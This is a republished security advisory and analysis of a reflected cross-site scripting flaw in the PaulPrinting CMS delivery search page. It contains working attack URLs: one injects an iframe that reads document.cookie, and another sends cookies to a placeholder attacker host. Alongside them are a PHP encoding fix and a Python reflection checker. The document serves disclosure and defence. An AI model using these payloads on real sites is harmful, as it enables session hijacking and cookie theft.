PaulPrinting CMS - (Search Delivery) Cross Site Scripting

Exploit Author: Vulnerability-Lab
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-07-20
Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting 
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286
Release Date:
=============
2023-07-17
Vulnerability Laboratory ID (VL-ID):
====================================
2286
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Product & Service Introduction:
===============================
PaulPrinting is a feature-rich, easy-to-use, search-engine-friendly CMS with a modern design and a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a non-persistent cross site scripting vulnerability in the PaulPrinting (v2018) CMS web-application.


Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Medium User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) CMS web-application.
Remote attackers are able to inject malicious script code into client-side requests and have it executed in the browser of a victim who loads the crafted link, exposing that user's session data.

The vulnerability is located in the search input field of the delivery module, whose q parameter is reflected into the page without validation or encoding.
The parameter value is written into the value attribute of the search form's input element, so a value that closes the attribute and the tag (for example a">) can introduce arbitrary markup and script into the response.
The request method is GET and the attack vector is non-persistent: the payload is carried in the URL and is not stored by the application.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious sources and non-persistent manipulation of the affected application modules.


Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /account/delivery

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] q

Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts


Proof of Concept (PoC):
=======================
The non-persistent XSS web vulnerability can be exploited by remote attackers with a low privileged user account (the session log below was captured from a logged-in member session, and the module lives under /account/) and medium user interaction.
For a security demonstration or to reproduce the vulnerability, follow the provided information and steps below.

PoC: Example
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>


--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33


Vulnerable Source: (Search - delivery?q=)
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right">
<i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">">
<div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button>
</div></div>


Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


PaulPrinting CMS – (Search Delivery) Cross-Site Scripting Vulnerability Analysis

Security researchers at the Vulnerability Laboratory have identified a non-persistent cross-site scripting (XSS) vulnerability in the PaulPrinting CMS (v2018), specifically within the /account/delivery module. The flaw, assigned VL-ID 2286, is rated medium risk (CVSS 5.2) and underscores the importance of output encoding in web applications.

Overview of the Vulnerability

The vulnerability arises from insufficient handling of the q parameter in the search input field, which is used to query delivery contacts. When a user submits a search via a GET request, the application writes the raw parameter value back into the value attribute of the search form's input element without HTML encoding. Because the reflection point is inside a double-quoted attribute, any value containing a double quote followed by a closing angle bracket terminates the attribute and the tag, after which the remainder of the value is parsed as new markup.

An attacker exploits this by crafting a URL whose q parameter carries such a payload; the script runs in the browser of any user who loads that URL. Since the vulnerability is non-persistent, nothing is stored on the server: the payload executes only in the response to the crafted request, so the attacker must get a victim to follow the link.

Technical Details & Attack Vector

Vulnerability Type: Non-Persistent Cross-Site Scripting (XSS)
Severity: Medium (CVSS: 5.2)
Attack Method: Remote (via GET request)
Authentication Required: Listed in the advisory as open authentication (anonymous privileges); note, however, that the PoC session log was recorded from a logged-in member session and the affected module sits under /account/, so a low privileged account may be needed to reach it
User Interaction: Medium (the victim must open the crafted URL)
Disclosure Type: Responsible Disclosure

Exploitation Scenario

Consider a scenario where a user navigates to the delivery search page:

https://example.com/account/delivery?q=hello

The application echoes hello inside the input element, as value="hello". Because the parameter lands inside a quoted attribute, a bare <script> tag would simply be stored as attribute text and would not run; the attacker first has to close the attribute and the tag, which is exactly what the advisory's payload does:

https://example.com/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>

The response now contains value="a"> followed by a live iframe element, and the browser fires its onload handler, producing an alert that shows the user's cookies. While this is a benign demonstration, real-world exploitation can include:

  • Session hijacking via theft of cookies or tokens.
  • Phishing attacks using fake login forms embedded in the page.
  • External redirects to malicious domains.
  • Manipulation of UI elements to alter user experience or inject fake content.

Proof of Concept (PoC)

Below is an illustrative PoC request (the host and exfiltration endpoint are placeholders, not part of the advisory), again using the attribute break-out the sink requires; a browser would send the query percent-encoded, it is shown decoded here for readability:

GET /account/delivery?q=a"><script>document.location='https://malicious-site.com/steal?cookie='+document.cookie</script> HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0

Explanation: The injected script runs as soon as the page is parsed and redirects the victim to an attacker-controlled site, appending document.cookie to the URL. No server-side control intervenes because the application reflects the value verbatim; whether the session cookie itself is readable depends on whether it is flagged HttpOnly, which the advisory's session log does not show.

Root Cause Analysis

The core issue lies in the application's failure to encode the q parameter for the HTML attribute context in which it is rendered. In secure development practice, untrusted input that is reflected into a page should be:

  • Encoded for its output context using HTML entity encoding (so that < becomes &lt;, > becomes &gt;, " becomes &quot; and & becomes &amp;); this is the control that actually prevents the break-out.
  • Validated against an allow-list of expected characters or formats where the field's purpose permits it (a search term rarely needs angle brackets or quotes).
  • Sanitized only where rich markup is genuinely required, using a dedicated HTML sanitizer rather than ad-hoc character removal.

Without these safeguards, any untrusted input becomes a potential execution point for malicious code.

Recommended Mitigations

To prevent such vulnerabilities, developers should implement the following security best practices:

  • Use context-aware encoding: Encode output based on the context (HTML, JavaScript, URL, etc.).
  • Implement input validation: Restrict input to alphanumeric characters and common punctuation, rejecting any script-like syntax.
  • Use Content Security Policy (CSP): Add a CSP header to block inline scripts and restrict trusted sources.
  • Sanitize all user inputs before rendering in the UI.

For example, in PHP, a secure implementation of the reflection would look like:

<?php
// Read the search term; default to an empty string when q is absent.
$unsafe_input = $_GET['q'] ?? '';

// htmlspecialchars() with ENT_QUOTES encodes &, <, >, " and ', so the value
// is safe in HTML body text and inside a double- or single-quoted attribute.
$safe_output = htmlspecialchars($unsafe_input, ENT_QUOTES, 'UTF-8');

// The same encoded value is safe in both sinks the delivery page uses:
// the input's value attribute and the results heading.
echo '<input type="text" class="form-control" name="q" value="' . $safe_output . '">';
echo "<div>Search results for: $safe_output</div>";
?>

Explanation: The htmlspecialchars() function converts the characters &, <, >, " and ' to their HTML entities, so a reflected value can neither close the value attribute nor open a new tag, and the payload above is displayed as literal text instead of being executed. Apply the encoding at the point of output, not at input, so every sink on the page is covered regardless of how the value was received.
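To make the root cause and the fix concrete, here is an added example (not PaulPrinting code and not from the advisory) that models the delivery search sink in Python: one renderer echoes q verbatim as the vulnerable page does, the other applies html.escape(quote=True), which encodes the same five characters as PHP's htmlspecialchars() with ENT_QUOTES. It also includes the check a tester would run against a captured response to decide whether the parameter is reflected unencoded: parse the HTML and see whether any tag carried by the probe became a real element, or whether the input's value attribute no longer round-trips. The form template, the canary token and the helper names are assumptions; the payload and PoC URL are the advisory's own.

```python
"""Added example, not vendor code: model of the /account/delivery search sink
plus a reflection check. The template below is an assumption based on the
advisory's "Vulnerable Source" excerpt, not the real PaulPrinting template."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Payload and URL exactly as published in the advisory.
ADVISORY_PAYLOAD = 'a"><iframe src=evil.source onload=alert(document.cookie)>'
POC_URL = "https://codeawesome.in/printing/account/delivery?q=" + ADVISORY_PAYLOAD

# Assumed minimal reproduction of the sink: q lands inside a double-quoted
# value attribute. Nothing else in the template contains braces.
FORM_TEMPLATE = (
    '<form class="form-inline mt-4 mb-2" method="get">'
    '<input type="text" class="form-control" name="q" value="{q}">'
    '<button type="submit">Search</button></form>'
)


def render_vulnerable(q: str) -> str:
    """Echo q verbatim: the behaviour the advisory describes."""
    return FORM_TEMPLATE.format(q=q)


def render_fixed(q: str) -> str:
    """html.escape(quote=True) encodes & < > " ' like htmlspecialchars(ENT_QUOTES),
    so the value can neither close the attribute nor open a tag."""
    return FORM_TEMPLATE.format(q=html.escape(q, quote=True))


def probe_from_url(url: str) -> str:
    """Recover the q value from a captured request URL (percent-decoded)."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def canary_probe(token: str = "xss7") -> str:
    """Generic, harmless probe (assumed token): closes the attribute and the
    tag, then introduces a made-up element that a parser will still record."""
    return f'{token}"><{token}>'


class _TagCollector(HTMLParser):
    """Records every start tag and the value attribute of the q input."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.q_value: str | None = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        a = dict(attrs)
        if tag == "input" and a.get("name") == "q":
            self.q_value = a.get("value")  # HTMLParser entity-decodes this


def reflects_unencoded(page_html: str, probe: str) -> bool:
    """True when the probe broke out of the attribute: a tag named in the probe
    was parsed as a real element, or the input's value no longer equals the
    probe (a missing q input is also flagged, so a blank page is not 'safe')."""
    probe_tags = {t.lower() for t in re.findall(r"<([A-Za-z][\w-]*)", probe)}
    p = _TagCollector()
    p.feed(page_html)
    return any(t in probe_tags for t in p.tags) or p.q_value != probe


if __name__ == "__main__":
    probe = probe_from_url(POC_URL)
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        page = render(probe)
        print(f"{name:10s} reflected unencoded: {reflects_unencoded(page, probe)}")
        print("  ", page)
```

Running the module shows the vulnerable rendering flagged (an iframe element appears and the input's value is truncated to "a") and the fixed rendering passing (the input's value round-trips and no new element is created). The parser-based check is deliberately used instead of a substring match so that an encoded reflection such as &lt;iframe is not mistaken for a live element.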

Impact & Risk Assessment

Although the vulnerability is non-persistent, its impact remains significant due to:

  • Low barrier to entry: the advisory lists open authentication, though the PoC was captured from a logged-in member session and the module is under /account/, so at most a low privileged account is needed.
  • Medium user interaction: a victim has to open the crafted link.
  • Potential for session compromise and data theft if the session cookie is readable from script.

Attackers could leverage this vulnerability in social engineering campaigns, such as sending phishing links via email or social media, tricking users into visiting the malicious URL.

Vendor Response & Timeline

Security researchers reported the vulnerability on August 25, 2022, and the vendor was notified on August 26, 2022. The advisory's timeline records no vendor response, fix or acknowledgement date, and the issue was published on July 17, 2023, almost eleven months later. The absence of a documented fix means operators of PaulPrinting v2018 should assume the issue is still present and apply the output encoding described above themselves.

Conclusion

The PaulPrinting CMS XSS vulnerability serves as a reminder that even seemingly benign features like search inputs can become critical security weaknesses. Developers must treat all user input as untrusted and apply consistent security measures across the entire application lifecycle.

Security is not a one-time fix—it’s a continuous process. Regular code audits, input validation, and defensive encoding are essential to protect users from evolving threats like XSS.